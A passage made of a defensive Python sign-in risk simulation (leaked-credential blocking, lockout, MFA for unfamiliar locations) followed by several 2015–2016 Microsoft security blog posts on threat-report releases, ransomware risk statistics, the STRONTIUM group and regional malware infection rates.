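        self.failures = defaultdict(list)   # user -> timestamps of wrong passwords

    def evaluate(self, s: SignIn) -> str:
        # 1. Credentials known to be leaked are blocked even if the password is valid.
        if s.leaked:
            return "block:leaked-credential"

        # 2. Incorrect-password lockout: too many recent failures blocks the account,
        #    which stops online guessing even once a guess is finally right.
        recent = [t for t in self.failures[s.user] if s.ts - t <= LOCKOUT_WINDOW]
        self.failures[s.user] = recent
        if len(recent) >= LOCKOUT_THRESHOLD:
            return "block:lockout"
        if not s.password_ok:
            recent.append(s.ts)
            return "deny:bad-password"

        # 3. Valid password: location familiarity decides whether to step up.
        if s.country in self.familiar[s.user]:
            return "allow"
        return "challenge:mfa"     # valid password, unfamiliar location

    def mfa_succeeded(self, s: SignIn) -> None:
        # Only a completed second factor teaches the profile a new location;
        # otherwise an attacker holding the password could make their own
        # location "familiar" just by signing in from it.
        self.familiar[s.user].add(s.country)


def run_sample():
    """Process constructed records and return the decision for each one."""
    t0 = datetime(2016, 5, 5, 9, 0, 0)
    sec = timedelta(seconds=1)
    records = [
        SignIn(t0, "alice", "US", True),                          # familiar location
        SignIn(t0 + 60 * sec, "alice", "BR", True),               # valid password, new location
        SignIn(t0 + 120 * sec, "bob", "DE", True, leaked=True),   # password leaked elsewhere
    ]
    # carol: five wrong passwords in five seconds, then the right one
    records += [SignIn(t0 + 180 * sec + i * sec, "carol", "US", False) for i in range(5)]
    records.append(SignIn(t0 + 240 * sec, "carol", "US", True))
    ap = AccountProtection({"alice": ["US"], "bob": ["DE"], "carol": ["US"]})
    return [ap.evaluate(r) for r in records]


def mfa_learning_demo():
    """Show that a location becomes familiar only after a second factor succeeds."""
    ap = AccountProtection({"alice": ["US"]})
    s = SignIn(datetime(2016, 5, 5, 10, 0, 0), "alice", "BR", True)
    before = ap.evaluate(s)
    ap.mfa_succeeded(s)
    return before, ap.evaluate(s)


if __name__ == "__main__":
    for decision in run_sample():
        print(decision)
    print(mfa_learning_demo())
```

The ordering matters: the leaked-credential and lockout checks run before the familiarity check, so a correct password never unlocks an account that is mid-lockout, and a new location is learned only through `mfa_succeeded`, never by the password alone.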

New Threat Intelligence Provides Details on Attacks
Here is some of the new data we published in this Security Intelligence Report:

  1. Compromised login attempts were blocked from unfamiliar locations nearly three quarters of the time.
  2. Attackers were located in different parts of the world:
    • 49% in Asia
    • 20% in South America
    • 14% in Europe
    • 13% in North America
    • 4% in Africa

Understanding where attacks are originating from, allows us to recognize attack patterns which we can then use to protect other systems and customers.

From all this data gathering and analysis, each day Microsoft’s account protection systems automatically detect and prevent more than 10 million attacks, from tens of thousands of locations, including millions of attacks where the attacker has valid credentials. That’s over 4 billion attacks prevented last year alone.

Very few organizations can access this much high quality data, aggregate it, and analyze it, every day, on-premises, and use it to make timely security decisions. Through our machine learning capabilities, the Microsoft cloud protects customers in a highly sophisticated way, faster than most organizations could do on-premises.

Guidance

In every Security Intelligence Report, we provide some guidance that helps protect people and organizations. There are a few things people can do to protect their accounts and devices from password based attacks:

  • The security of your account is particularly important if your username is an email address, because other services may rely on your email address to verify your identity. If an attacker takes over your account, they may be able to take over your other accounts too (like banking and online shopping) by resetting your passwords by email.
  • Tips for creating a strong and unique password:
    • Don’t use a password that is the same or similar to one you use on any other website. A cybercriminal who can break into that website can steal your password from it and use it to steal your account.
    • Don’t use a single word (e.g. “princess”) or a commonly-used phrase (e.g. “Iloveyou”).
    • Do make your password hard to guess even by those who know a lot about you (such as the names and birthdays of your friends and family, your favorite bands, and phrases you like to use).
  • Two-step verification boosts account security by making it more difficult for hackers to sign in—even if they know or guess your password.
  • If you turn on two-step verification and then try to sign in on a device we don’t recognize, we’ll ask you for two things:
    • Your password.
    • An extra security code.
    • We can send a new security code to your phone or your alternate email address, or you can get one through an authenticator app on your smartphone.
  • If your organization hasn’t started leveraging the cloud because you don’t think you can get the visibility or control you need, it’s time to re-evaluate it – the scale, and the threat intelligence and new security capabilities it enables, are likely going to provide higher ROI than you can get on-premises.
  • Organizations should evaluate how the cloud will help them evolve to a “protect, detect, respond” security strategy. Evaluate Azure Active Directory Identity Protection, which is in preview right now.

The new Security Intelligence Report is available at www.microsoft.com/sir.

Tim Rains
Director, Security

Microsoft Security Intelligence Report Volume 20 is now available

May 5th, 2016 No comments

The latest volume of the Microsoft Security Intelligence Report (SIR) is now available for free download at www.microsoft.com/sir.

We’ve been publishing threat intelligence reports for our customers, partners and the industry for 10 years now. During that time, we’ve published over 12,500 pages of threat intelligence, 100+ blog posts, many videos, and delivered thousands of customer briefings all over the world.

This new volume of the report includes threat data from the second half of 2015 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides deep dive threat data for over 100 countries/regions.

There are a couple of new sections in this volume of the SIR that I’m excited to share.

First, the report includes a section called “PLATINUM: Targeted attacks in South and Southeast Asia.” This section provides details on a newly discovered determined adversary group, which Microsoft has code-named PLATINUM. This group has conducted several cyber espionage campaigns since 2009, focusing on targets associated with governments and related organizations in southeast Asia. This information can help you understand mitigations that can significantly reduce the risks that organizations face from such groups.

The other section I’m excited about is called “Protecting Identities in the Cloud: Mitigating Password Attacks.” This section of the report focuses on some of the things that Microsoft does to prevent account compromise inside our cloud services. This is the first time we’ve published data like this in the SIR.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 20 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Tim Rains
Director, Security

Ransomware: Understanding the Risk

April 22nd, 2016 No comments

Ransomware is a type of malware that holds computers or files for ransom by encrypting files or locking the desktop or browser on systems that are infected with it, then demanding a ransom in order to regain access. Criminals have used high pressure techniques to get victims to pay the ransom, such as:

  • Make encrypted data unrecoverable after a certain period of time
  • Threaten to post captured (potentially sensitive) data publicly
  • Use fear by claiming to be law enforcement and threaten prosecution
  • Increase the ransom payment amount as time goes on
  • Render the machine unbootable when it overwrites the Master Boot Record and encrypts physical sectors on disk
  • Threaten to erase all data and render all enterprise computers inoperable

Figure 1: An example of a ransomware ransom demand

There is heightened concern across the industry about ransomware because of some high profile cases that illustrate ransomware isn’t just a threat for consumers to worry about, as it is being used in attacks on enterprises as well.

Although we know attackers that leverage ransomware are motivated by profit, the underlying reasons they have attacked specific organizations or industries are not as straightforward. Some attackers might very well be targeting specific industries with ransomware attacks. Other attackers might simply be leveraging their capabilities; i.e. they have developed the capability to exploit specific vulnerabilities in specific platforms or specific line-of-business applications that happen to be primarily used in, or get heavy use by, specific industries.

Ransomware is a topic that I have written about in the past (Ransomware: Ways to Protect Yourself & Your Business, Ransomware is on the Rise, Especially in Europe) and that we have covered extensively in some volumes of the Microsoft Security Intelligence Report. The Microsoft Malware Protection Center has provided extensive information about this category of threats (Ransomware, No mas, Samas: What’s in this ransomware’s modus operandi?, The three heads of the Cerberus-like Cerber ransomware, Locky malware, lucky to avoid it, MSRT October 2015: Tescrypt, MSRT September 2015: Teerac, MSRT July 2015: Crowti, Emerging ransomware: Troldesh, Your Browser is (not) Locked, etc.)

Given the heightened concern in the industry, I thought it was time to examine if the risk associated with this threat category has been increasing. This will help CISOs, security teams, and risk managers understand if they should prioritize this risk differently now than they have in the past. As always, risk is the combination of probability and impact.

Let me start by providing some data and insights that will help organizations understand the probability component associated with the risk of ransomware. Using data from the Microsoft Security Intelligence Report, which includes data based on telemetry from hundreds of millions of systems around the world, we can see that ransomware has been encountered worldwide much less frequently than almost all other types of malware. Figure 2 illustrates the encounter rates for malware categories for each quarter ending in the second quarter of 2015. The encounter rate (ER) is the percentage of computers running Microsoft real-time security software that report detecting malware or potentially unwanted software during a quarter. Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender reporting that they blocked malware from installing on them.

Figure 2: Encounter rates for significant malware categories, third quarter of 2014 (3Q14) – second quarter of 2015 (2Q15)

The worldwide ER for ransomware in the first quarter of 2015 (1Q15) was 0.35 percent and 0.16 percent in the second quarter (2Q15) as seen in Figure 2. While the ER for Trojans was 3.92 percent and 4.45 percent in 1Q15 and 2Q15 respectively. That means the ER for Trojans was 11 times higher than the ransomware ER in 1Q15 and 28 times higher in 2Q15. More recent data for the last half of 2015 suggests there was a slight increase in the ER for ransomware (0.26 percent in 3Q15, 0.40 percent in 4Q15), but it’s still a fraction of 1 percent and much lower than almost every other category of malware. The most recent data, from the last month (March 2016), suggests that the worldwide ER for ransomware was 0.2 percent, putting it almost on par with the ER for Trojan Downloaders & Droppers, but still lower than viruses (file infectors) and most other threat categories.

Although the global encounter rate is just a fraction of a percent, there are some countries/regions that have higher ransomware encounter rates; i.e. the probability of encountering ransomware is higher in some locations than others. For example, in 2Q15 (when the worldwide ER was 0.16 percent) the ER in Mexico was 5 times higher, at 0.8 percent. France and Canada had ransomware encounter rates 4.4 times higher than the worldwide average at 0.7 percent, while the United States, Russia and Turkey all had elevated ransomware encounter rates, 3.75 times higher than the worldwide average, at 0.6 percent.

The locations that had the highest ransomware ERs in the world in 2015 are listed in Figures 3 and 4. Portugal and Italy were among the locations with the highest ransomware ERs in both halves of 2015.

Figure 3 (left): The countries/regions with the highest ransomware encounter rates in the world in the first half of 2015; Figure 4 (right): The countries/regions with the highest ransomware encounter rates in the world in the second half of 2015

Although the ransomware ER in the UAE, for example, in the first half of 2015 was the highest in the world, ransomware is still one of the least encountered categories of threats there as Figure 5 illustrates. A ransomware family does not appear in the top 10 list of threats in the UAE.

Figure 5: Malware encountered in the United Arab Emirates in the second quarter of 2015, by category

The infection rate is typically a fraction of the ER because systems have to encounter malware before they can get infected. Data in several volumes of the Security Intelligence Report suggests that 70 percent to 80 percent of systems that run the MSRT also run up-to-date real time antivirus. This means most systems will be able to block the installation of known commodity ransomware before they can become infected. Thus ER is typically much greater than the actual infection rate.

The malware infection rate, called the Computers Cleaned per Mille (CCM), is measured by the number of computers cleaned for every 1,000 unique computers that run the Windows Malicious Software Removal Tool (MSRT). For example, if MSRT has 50,000 executions in a particular location in the first quarter of the year and removes infections from 200 computers, the CCM for that location in the first quarter of the year is 4.0 (200 ÷ 50,000 × 1,000).

Detection for new malware families is typically added to the MSRT every month. The MSRT cleans many of the most prevalent families of ransomware like Win32/Crowti, Ransom:Win32/Reveton, and Win32/Samas. Of these, Crowti had the highest CCM in the second half of 2015: 0.04 in 3Q15 and 0.01 in 4Q15. This means that for every 1,000 systems the MSRT executed on in the fourth quarter of 2015, 0.01 were cleaned of Crowti; that’s 1/1000 of a percent of the hundreds of millions of systems the MSRT executes on each month.

The ER data I outlined above suggests that ransomware represents a risk that has been lower probability relative to other types of malware in most parts of the world. But the rapid evolution of ransomware suggests that these numbers could rise in the future. Email (spam, spear-phishing, etc), social engineering using Word and Excel macros, drive-by download attacks, and removable storage devices (USB drives) are among the most common ways attackers have distributed ransomware. This has been evolving rapidly.

The ability for less-skilled attackers to mount ransomware campaigns has increased recently, due to the emergence of ransomware-as-a-service (RaaS) offerings on the darkweb. Sarento and Enrume are ransomware families that are examples of this approach. Ransomware is being increasingly paired with exploit kits, such as JS/Axpergle (a.k.a. Angler), and other malware to gain persistence in victims’ environments. More attackers using more distribution points has led to more enterprises encountering ransomware as figures 6 and 7 illustrate. Additionally, ransomware can be distributed to systems via other malware, i.e. existing infections, to increase attacker monetization of the assets they control.

When comparing these figures, notice how the ER for ransomware increased between the first and second halves of 2015 surpassing the ER of Password Stealers & Monitoring Tools. Also notice that the ER for ransomware on domain joined systems surpassed that of non-domain joined systems.

Figure 6: Malware and unwanted software encounter rates for domain-based and non-domain computers, in the first half of 2015, by category

Figure 7: Malware and unwanted software encounter rates for domain-based and non-domain computers, in the second half of 2015, by category

More sophisticated attackers that target enterprises try to encrypt as much of their target’s critical data as possible. To do this, they need to move beyond encrypting data on a single device. They use all the dirty tricks in their toolkits to get a foothold in an organization’s IT environment including exploiting unpatched vulnerabilities, taking advantage of misconfigured systems and weak passwords, and of course social engineering.

The main entry points for these attacks are vulnerable Internet facing servers and user workstations. Once they have compromised a single system, they use tactics similar to “APT” style attacks to traverse the infrastructure looking for more data to encrypt. To do this, they will gather credentials on the initial point of entry, attempt to gain elevated privileges (e.g. domain administrator), use those credentials to map out the organization’s network, then move laterally to new hosts, gathering more credentials that will allow them to encrypt data on as many machines as possible. Attackers will also deny the victim organization access to their backups, if they can, to increase the motivation to pay the ransom.

Once attackers have access to data (.pdf, .xlsx, .docx, etc.) they believe is valuable to the victim organization, they encrypt it. As ransomware has evolved, more of this malware has employed correctly implemented strong encryption algorithms (the Advanced Encryption Standard (AES), for example), which prevent recovery without a valid decryption key or restoring the original files from backup. Without backups, the impact of this type of attack on a business could be severe; the loss of intellectual property, customer data, and financial records could have irreversible consequences for a business.

The Samas family (Ransom:MSIL/Samas) of ransomware is a great example of ransomware using some of these tactics.  The MMPC has published a great article on this family: No mas, Samas: What’s in this ransomware’s modus operandi?

Detection for Samas was added to the MSRT in April 2016. The infection rate (CCM) for Samas is virtually zero, as it has only been seen used in targeted attacks versus used in broad attacks as commodity ransomware.

Figure 8: Ransom:MSIL/Samas infection chain

Ransomware has been evolving quickly. Last month (March 2016) the top 5 ransomware families encountered included Ransom:Win32/Tescrypt, Ransom:Win32/Locky, Ransom:Win32/Crowti, Ransom:JS/Brolo, Ransom:Win32/Teerac.

Although commodity ransomware has relatively low encounter rates and low infection rates, when determining the probability and impact in ransomware risk calculations it’s important to consider that ransomware is also being used as part of ransomware-as-a-service kits and by determined adversaries in targeted attacks.

The fact that ransomware families aren’t very prevalent at this point is good news. But that doesn’t make it any less painful to the users and organizations that have been victimized. This is why Microsoft is so committed to continually raising the bar on attackers and helping our customers with these threats. There is a plethora of mitigations available for enterprise customers, both on-premises and cloud-based. Windows 10 has numerous advanced security features that can make it much harder for attackers to be successful with ransomware. The Office 365 Security team published an excellent article that provides some great mitigations, a highly recommended read: How to Deal with Ransomware.

Additionally, I asked some of the experts in Microsoft’s Enterprise Cybersecurity Group to provide some guidance based on the work they are doing to help enterprise customers protect, detect and respond to ransomware cases. The Enterprise Cybersecurity Group has unique, industry-leading cybersecurity expertise from client to cloud that I’m excited to tap. They have helped numerous enterprise customers protect, detect and respond to some of the most sophisticated ransomware attacks to date. This experience informs their approach, something partially summarized in the table below.

  • Detect: Ingress protections; Auto-scale endpoint protections; Behavioral and deterministic detections leveraging Deep Packet Inspection
  • Protect: Reputational services; High Value Asset protection, containment, isolation
  • Respond: Response planning; Offline backups; Regular hunting and validation

We will share more from the Enterprise Cybersecurity Group in the next article in this series on ransomware.

Tim Rains
Director, Security
Microsoft

Defending against persistent attackers: What we’ve learned

Part of what we do at the Microsoft Malware Protection Center involves keeping tabs on known activity groups. This is some of the most interesting and intriguing work we do.

One particularly aggressive and persistent group we track is known within Microsoft by the code-name “STRONTIUM” (following our internal practice of assigning chemical element names to such groups).

Whereas most cyber-attack groups are ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary targets include government bodies, diplomatic institutions, and military forces. The group has also been known to target journalists, political advisors, and organizations associated with political activism. With such lofty targets, you might expect the group to be highly sophisticated, and it is.

STRONTIUM primarily attempts to ensnare individuals using spear phishing tactics through email or social networking channels. The idea is to dupe people into giving up their login credentials so the group can perform reconnaissance on a target organization. Their lure messages are typically tied to current events such as an upcoming conference or real-world news, and STRONTIUM’s email senders are usually associated with well-known email providers, using plausible names and titles designed to give the messages credibility.

The ultimate goal of this reconnaissance phase is to compile a list of high-value individuals who have information or access that STRONTIUM wants. With this list at hand, the group moves to the next phase of operations — installing malware on the high-value targets’ computers and thereby gaining access to the institution’s network. Depending on the specific attack used, they might send a message with a link that will launch a drive-by download when clicked, or a malicious attachment such as a document file containing an exploit.

It is not yet clear whether the group researches vulnerabilities and develops the exploits themselves, or purchases them on the black market, but Microsoft researchers have observed STRONTIUM moving swiftly to take advantage of newly disclosed vulnerabilities. They are also known for zero-day exploits targeting vulnerabilities where the software vendor has not yet released a security update. STRONTIUM also targets older vulnerabilities that simply haven’t been patched by the organization, and attacks involving non-Windows computers are a concern as well.

Considering STRONTIUM’s broad range of technical capabilities and its determination to keep up an attack for months or years until it succeeds, the group represents a significant threat that is difficult to defend against. Nevertheless, there are steps an organization can take to significantly decrease the probability of a successful attack:

  • Deploy vendor security updates quickly after they are released. STRONTIUM looks for out-of-date software installations inside target institutions. Keeping software current denies the group this avenue of infiltration.
  • Take advantage of the latest mitigation technologies. Recent versions of Windows (most notably Windows 10) and other software include critical mitigations that can render many of STRONTIUM’s exploits ineffective.
  • Enforce segregation of privileges and apply all possible safety measures to protect Admin accounts. STRONTIUM relies on pass-the-hash techniques and elevation of privileges to successfully move laterally across networks.
  • Conduct enterprise software security awareness training. STRONTIUM heavily relies on social engineering to entice individuals into clicking links to malware. Security training can raise awareness around this attack vector.
  • Institute multi-factor authentication. As STRONTIUM extensively uses credential-stealing spear phishing attacks, multi-factor authentication can be an effective tool to prevent unauthorized access even if credentials are stolen.
  • Prepare your network to be forensically ready. A forensically ready network that records authentications, password changes, and other significant network events can help to quickly identify affected systems.
  • Keep personnel and personal data private. STRONTIUM uses open-source intelligence to obtain its initial lists of victims, which might include names and email addresses, but can expand into employment information and other items of interest. Make sure your email is kept confidential and privacy settings on social media don’t disclose sensitive information publicly. These are all pieces of information STRONTIUM can use to devise a realistic attack.

For a deeper look at the STRONTIUM adversary, including technical information that can help your IT department keep your organization safe, see the latest Microsoft Security Intelligence Report here.

To learn more about how Microsoft helps protect your security and privacy in the cloud, visit Trusted Cloud.

The Threat Landscape in Canada – 2015 Update

November 30th, 2015 No comments

I have written about the threat landscape in Canada a couple of times over the years. Using new data from the latest volume of the Microsoft Security Intelligence Report, volume 19, I thought I’d take a fresh look at what has been happening in Canada, as it’s been about a year since I last published an article on it.

If you are interested in reading some of the analysis I have done on the threat landscape in Canada in the past, please read these articles: The Threat Landscape in Canada, The threat landscape in Canada & SecTor 2012. Additionally, last month I had the opportunity to speak at the Security Education Conference Toronto (SECTor 2015), Canada’s largest cybersecurity conference. You can watch a video of the presentation I gave at the conference as well as a video interview I did there: Cyberthreats: Microsoft’s Tim Rains on Putting Old Wine in New Bottles.

Let’s start with the encounter rate (ER) in Canada, which is the percentage of computers running Microsoft real-time security software in Canada that reported detecting malware, or reported detecting a specific threat or family, during a quarter. Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender (on Windows 8.1) reporting that they blocked malware from installing on them. As Figure 1 illustrates, the ER in Canada has been below the worldwide average for many quarters; the worldwide average encounter rate in the second quarter of 2015 (2Q15) was 14.8%, while the ER in Canada was 12.5% during the same period.

Figure 1: the long-term encounter rate (ER) for Canada and the worldwide average per quarter for the period between the 3rd quarter of 2012 through the 2nd quarter of 2015

Although Canada’s ER has been below the worldwide average and that of France for some time, it has been elevated in some time periods compared to the ERs of the United Kingdom and the United States as illustrated in Figure 2.

Figure 2: the long-term encounter rates (ER) for Canada, France, the United Kingdom, the United States, and the worldwide average per quarter for the period between the 3rd quarter of 2012 through the 2nd quarter of 2015

Figure 3 illustrates the long-term view of malware categories encountered by systems in Canada for the time period between the third quarter of 2012 (3Q12) and the second quarter of 2015 (2Q15). This data helps us understand the types of threats that Canadians encounter most frequently in each time period. Attackers change their tactics over time to favor malware types that they hope will successfully compromise systems. But any success they have is fleeting, as Microsoft and the rest of the security industry update protections to mitigate any threats that attempt to become relatively prevalent.

Figure 3: the long-term view of malware category encounter rates (ER) for Canada per quarter for the period between the 3rd quarter of 2012 through the 2nd quarter of 2015

Figure 3 shows us that the ER spike seen in Canada in 3Q14 was primarily due to an increase in encounters with malware families in the Trojan Downloaders & Droppers category. This category of threats was popular with attackers back in 2007, but we’ve seen a resurgence of these threats in more recent time periods.  The level of encounters with Exploits is also noteworthy as it suggests that Canadians have encountered exploit kits at relatively high frequency; Figures 4 and 5 support this supposition. Figure 4 shows us that the ER for Exploits was higher in Canada than the worldwide average in 2Q15. Figure 5 provides a list of the top 10 malware threats encountered by Canadians in 2Q15, where 3 of the top 10 malware families encountered in Canada were exploit kits.

Figure 4: malware category encounter rates for Canada versus the worldwide average in the 2nd quarter of 2015

Figure 5: the top malware families encountered in Canada in the 2nd quarter of 2015

Malware encounters are much more common than malware infections; i.e. a system has to encounter malware before there’s a chance for it to get infected with malware. On average, about 17.0 percent of reporting computers worldwide encountered malware over the four quarters ending in 2Q15. At the same time, the Microsoft Windows Malicious Software Removal Tool (MSRT) removed malware from about 7.1 out of every 1,000 computers, or 0.71 percent. Figure 6 illustrates the ER and the malware infection rate (CCM) for Canada and the worldwide average for recent time periods.

Figure 6: malware encounters and infections in Canada between the 3rd quarter of 2014 and the 2nd quarter of 2015

Figure 7 provides the top 10 list of malware families that infected systems in Canada in 2Q15. Notice that many of the threats on this list are different from the list of threats that were encountered in Canada during the same period (Figure 5). Many of these threats leverage social engineering and require user interaction in order to infect systems. You can get additional details on many of these threats in the Microsoft Malware Protection Center’s malware encyclopedia.

Figure 7: top threat families by infection rate (CCM) in 2Q15

A few noteworthy threats include Win32/Kilim, Win32/Alureon, and Win32/Zbot. Kilim is a threat family that can install malicious Google Chrome browser plug-ins and can then use your social media profiles to like, share, and follow pages without your permission. Alureon is a family of data-stealing Trojans that can give a malicious hacker access to confidential information stored on a compromised PC, such as user names, passwords, and credit card data. They can also send malicious data to your PC and corrupt some driver files, making them unusable. Zbot is a family of Trojans that are created by kits known as “Zeus”. These kits are bought and sold on the black market, and the Trojans they produce can monitor online banking activities by hooking API addresses and injecting code into webpages.

Figure 8: phishing sites and malware hosting sites in Canada versus the worldwide average

Many times, compromised systems are used as malware hosting sites, phishing sites, drive-by download sites, and so on. The relative levels of these web-based threats differ by country/region. Figure 8 shows us that in Canada the levels of phishing sites and malware hosting sites are slightly elevated above the worldwide average. To help put this into context, an example of a location with a very high level of phishing sites is Bulgaria, with 98.5 phishing sites per 1,000 hosts. A location with a high number of malware hosting sites is Brazil, with 40.97 malware hosting sites per 1,000 hosts.

I hope you’ve found this analysis useful.

Tim Rains
Chief Security Advisor
Enterprise Cybersecurity Group

Microsoft Security Intelligence Report Volume 19 is now available

November 18th, 2015 No comments

We’ve just published hundreds of pages of new threat intelligence available for free download at www.microsoft.com/sir.

This includes threat data from the first half of 2015 as well as longer term trend data on the industry vulnerabilities, exploits, malware, and malicious websites that your organization should use to assess your current security posture. We are also providing threat data for over 100 countries/regions.

Additionally, this volume of the report includes a case study and profile on a determined adversary code-named “Strontium.” This case study provides insight into the techniques that these modern threat actors are using. My colleagues in the Microsoft Malware Protection Center have written an article on Strontium that will give you more details and context: http://blogs.technet.com/b/mmpc/archive/2015/11/18/microsoft-security-intelligence-report-strontium.aspx.

Also included in this volume of the report is an in-depth look at the malware behind much of the bank fraud that has characterized the threat landscape in Brazil for the better part of the last decade. This is required reading for financial services customers.

One of my favorite new data-sets in this report is exploit detection data from the IExtensionValidation interface in Internet Explorer 11. Essentially, this interface enables real-time security software to block ActiveX controls from loading on malicious web pages. When Internet Explorer loads a webpage that includes ActiveX controls, if the security software has implemented IExtensionValidation, the browser calls the security software to scan the HTML and script content on the page before loading the controls themselves. If the security software determines that the page is malicious (for example, if it identifies the page as an exploit kit landing page), it can direct Internet Explorer to prevent individual controls or the entire page from loading. The interface helps protect our customers, and the data it provides helps us understand how attackers are evolving their web-based attacks, such as drive-by download attacks and watering hole attacks. The data in Figure 1 shows how attackers have shifted from attacking Flash and Java controls at almost the same frequency to targeting Flash almost 100% of the time. This illustrates the importance of ensuring that Flash is being patched efficiently in your environment.

Figure 1: ActiveX controls detected on malicious webpages through IExtensionValidation, 3Q14–2Q15, by control type

And of course, the report also contains the guidance your organization can use to protect its data and assets.

You can download Volume 19 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

Historic High Infection Rates – The Threat Landscape in the Middle East

October 21st, 2015 No comments

I have written about the threat landscape in the Middle East extensively over the years. It’s been about 18 months since I published my last article on this part of the world and malware infection rates in some locations in the region have since risen to historic highs – far above the highest malware infection rates ever published in the Microsoft Security Intelligence Report. So I thought I’d take a fresh look at what has been happening in some locations in the Middle East.

If you are interested in some of the analysis and insights that we have published in the past, here are some of the most recent articles:

The Threat Landscape in the Middle East and Southwest Asia – Part 1: Relatively High Malware Infection Rates
The Threat Landscape in the Middle East and Southwest Asia – Part 2: Relatively High Malware Encounter Rates
The Threat Landscape in the Middle East and Southwest Asia – Part 3: Regional Anti-virus Software Usage
The Threat Landscape in the Middle East and Southwest Asia – Part 4: Regional Windows XP Market Share
Threat Landscape in the Middle East and Southwest Asia – Part 5: Socio-economic Factors and Regional Malware Infection Rates
Threat Landscape in the Middle East and Southwest Asia – Part 6: Best Practices from Locations with Low Malware Infection Rates
Regime Stability, Demographic Instability and Regional Malware Infection Rates – Part 1: Egypt
Regime Stability, Demographic Instability and Regional Malware Infection Rates – Part 2: Syria
The Threat Landscape in the Middle East – Part 3: Israel and Saudi Arabia

The malware infection rates (CCM) in the Middle East have typically been well above the worldwide average. The exception has tended to be Israel where the infection rate has closely mirrored the worldwide average during many time periods as seen in Figure 1.

Before I explore what happened in late 2013 and 2014 to drive infection rates significantly higher in all the locations listed in Figure 1, you might also be wondering about Qatar’s relatively high infection rate in the first quarter of 2011 (1Q11) that can be seen in Figure 1. You can read about that in a previously published article: The Threat Landscape in the Middle East – Part 1: Qatar.

Figure 1: the malware infection rates (CCM) for Egypt, Iraq, Israel, Oman, the Palestinian Authority, Qatar, Saudi Arabia, Syria, the United Arab Emirates, and the worldwide average per quarter for the years 2011 through 2014

All of the locations listed in Figure 1 had malware infection rates above the worldwide average in all four quarters of 2014. There is a clear increase in the CCM in most of these locations starting in the fourth quarter of 2013 (4Q13) or the first quarter of 2014 (1Q14). Qatar and the United Arab Emirates (UAE) saw increases in CCM in 4Q13; Qatar’s CCM increased 2.4 times from 11.4 to 27.7, while the UAE’s CCM increased 2.8 times from 12.2 to 34.0. But then the CCM in both locations leveled out and decreased in the last half of 2014, as did the worldwide average. Several other locations that saw their CCMs increase in 4Q13, continued to see large CCM increases in the following quarter.

One of the largest infection rate increases was in Iraq. The CCM in Iraq increased from 31.3 in 4Q13 to 110.7 in 1Q14, a 3.5 times increase. Examining the threat families responsible for this very large increase leads us to two families: MSIL/Bladabindi and Win32/Jenxcus. Detection for Bladabindi was added to the Microsoft Windows Malicious Software Removal Tool (MSRT) in January of 2014. Subsequently, Bladabindi was found and removed from 27.9 systems for every 1,000 systems that the MSRT executed on in Iraq in 1Q14. Detection for Jenxcus was added to MSRT in February of 2014 and it was also a prevalent threat in the region, found and removed from 25.2 systems for every 1,000 systems that the MSRT executed on in Iraq during the same period. The sudden increase in detections of these two families is the primary reason for the infection rate increase in Iraq at the beginning of 2014 and the subsequent decrease over time as fewer and fewer systems were found to be infected with these two families of threats.

MSIL/Bladabindi can steal sensitive information and send it to a malicious hacker. This threat family can also download other malware and provide attackers with backdoor access on compromised systems. Variants of this family can spread via infected removable drives, such as USB flash drives. They can also be downloaded by other malware, or spread through malicious links and hacked websites. Bladabindi variants are usually installed with an enticing name and icon to trick people into running them.

Win32/Jenxcus uses social engineering to trick the victim into running a malicious script file that is commonly bundled with other programs. When the program bundle is executed Jenxcus runs silently in the background. Win32/Jenxcus also operates as a worm that detects whether the victim’s system has a removable drive connected to it. If it does, it copies itself onto that drive. It also creates a shortcut link pointing to its copy in the removable drive. Typically, this threat gets onto vulnerable systems via drive-by download attacks or via infected removable drives.

Beyond the CCM increase seen in Iraq, Figure 1 illustrates smaller but similar CCM increases for several other locations in the region including Egypt, Oman, Palestinian Authority (West Bank and Gaza Strip), Saudi Arabia, and Syria. Win32/Jenxcus was the primary threat family driving CCMs higher in the first quarter of 2014 in all of these locations except Syria.

In Syria Win32/Gamarue and Win32/Sality were responsible for driving the infection rate from a CCM of 34.0 in the fourth quarter of 2013 to 75.5 in the first quarter of 2014.

Besides Win32/Jenxcus, Sality also contributed to the infection rate increase in Egypt, where it has been a prevalent threat for some time. I’ve written about this before: Are Viruses Making a Comeback? Egypt’s CCM increased to 73.2 in the first quarter of 2014 from 27.6 the prior quarter, a 2.7 times increase.

Whereas infection rate (CCM) data comes from the Malicious Software Removal Tool, the encounter rate (ER) is the percentage of computers running Microsoft real-time security software that report detecting malware, or report detecting a specific threat or family, during a period. Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender (on Windows 8.1) reporting that they blocked malware from installing on them. For example, the worldwide average encounter rate in the fourth quarter of 2014 (4Q14) was 15.9%. As seen in Figure 2, with the exception of Israel, several locations in the Middle East have significantly higher than average ERs. I can’t show you the ER for all the countries we have CCM data for, as we don’t have enough systems reporting ER data from some of the locations in the region during this period of time.

Figure 2: the encounter rates (ER) for Egypt, Iraq, Israel, Qatar, Saudi Arabia, the United Arab Emirates, and the worldwide average per quarter for the period between the 3rd quarter of 2013 through the 4th quarter of 2014

Notice how the ER increases in the third quarter of 2013 (3Q13), as opposed to the first quarter of 2014, where we saw large increases in infection rates in the region. A few threats were involved in this increase. In most of these locations Win32/Rotbrow, Win32/Brantall, INF/Autorun, and VBS/Jenxcus all contributed to higher ERs during this period of time.

Malware families that abuse the Autorun feature (Win32/Autorun) have been some of the most prevalent threats encountered in the region for many years. These threats typically spread via USB drives and other removable media. I theorize that this type of threat is encountered in the Middle East so much because Internet connectivity is inconsistent in some locations, likely due to higher than average strife in places like Syria, Egypt, and Iraq. Subsequently, I postulate that people in these locations transfer files using removable media more often than in many other places, exposing more systems to Autorun attacks. It’s just an educated guess. I have written about this threat before: Defending Against Autorun Attacks.

Figure 3: Autorun infographic that shows how these worms can spread

